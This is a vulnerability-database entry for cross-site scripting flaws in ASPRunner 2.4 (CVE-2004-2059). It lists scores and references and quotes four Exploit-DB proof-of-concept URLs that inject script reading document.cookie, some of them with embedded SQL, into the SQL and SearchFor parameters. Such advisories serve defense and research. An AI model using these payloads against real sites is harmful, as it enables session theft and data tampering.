CVE-2004-2059
Published: 2004-12-31
Priority: P4 · 22 · medium · 5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 8.82% (94.5th percentile)
Multiple cross-site scripting vulnerabilities in ASPRunner 2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) SearchFor parameter in [TABLE-NAME]_search.asp, (2) SQL parameter in [TABLE-NAME]_edit.asp, (3) SearchFor parameter in [TABLE]_list.asp, or (4) SQL parameter in export.asp.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
No detection rules found.
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting
exploitdb·2004-07-26
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affected by these issues.
http://www.example.com/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting
exploitdb·2004-07-26
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affected by these issues.
http://www.example.com/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting
exploitdb·2004-07-26
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affected by these issues.
http://www.example.com/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQu
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting
exploitdb·2004-07-26
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affected by these issues.
http://www.example.com/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0011.html
http://ferruh.mavituna.com/article/?574
http://marc.info/?l=bugtraq&m=109086977330418&w=2
http://secunia.com/advisories/12164
http://securitytracker.com/id?1010777
http://www.osvdb.org/8254
http://www.osvdb.org/8255
http://www.osvdb.org/8256
http://www.osvdb.org/8257
http://www.securityfocus.com/bid/10799
https://exchange.xforce.ibmcloud.com/vulnerabilities/16801